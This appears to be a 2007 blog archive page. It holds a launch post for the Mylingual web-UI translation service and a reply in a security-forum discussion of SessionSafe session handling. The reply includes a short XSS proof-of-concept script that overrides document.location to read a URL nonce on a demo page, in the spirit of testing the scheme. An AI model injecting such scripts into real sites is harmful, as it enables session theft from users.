" /> Kazuho at Work: March 2007 Archives

« April 2006 | Main | April 2007 »

March 29, 2007

Mylingual - Launch Announcement

Today I have officially launched my new web service: Mylingual. From the website,

Mylingual is an automatic translation service for web-based application user interfaces. Known as Japanize, it is already used by more than 25,000 users to browse websites like YouTube or del.icio.us in Japanese. All you need is a User JavaScript installed onto your PC (firefox extension is now under development), and the Web UI will be automatically translated.

mylingual.net

Web applications like YouTube, del.icio.us, and Google Reader are good examples for Mylingual. They are excellent web applications used from everywhere around the globe by people with mother languages of great variety to access contents of their languages, but do only provide the application interfaces in English. It is a handicap for more than half of the total population of the world, especially for people using minor languages. As the world becomes flat and flat, and computer applications become web-based, localization is important than ever before.

Mylingual is a community-based approach to overcome the problem, to localize the applications by the users ourselves. The translations are automatically shared by using a wiki-like system. Anyone can participate in, improve, and discuss about the translations.

I started the original project targeted for Japanese users in August 2006. Known as Japanize, it has gained more than 25,000 users within five months. I hope people with other mother languages can share the same benefit from using Mylingual. Please have a try.

March 28, 2007

Re: SessionSafe: Implementing XSS Immune Session Handling

Re: SessionSafe: Implementing XSS Immune Session Handling
Posted by: majohn (IP Logged)
Date: March 08, 2007 04:46AM

ok, stop talking, let's break some code :) I found my old PoC-Code and put it (temporarily) online: [onetimeurls.databasement.net] (please notice: this is only a demo of the URLRandomizer not a full SessionSafe-PoC)

I genuinely would be interested if it is possible to steal the nonce from the url_randomizer object.

Re: SessionSafe: Implementing XSS Immune Session Handling - sla.ckers.org

Well, you can, by replacing the location object on Internet Explorer and Opera. I came to know the attack through the comments on snippets from shinichitomita’s journal. Thanks to nanto_vi-san.

Copy the below exploit onto the textarea of onetimeurls.databasement.net.

<script>
var document = { location: { href: '' } };
(function () {
  if (document.location.href == '') {
    setTimeout(arguments.callee, 1000);
  } else {
    alert(document.location.href);
  }
})();
</script>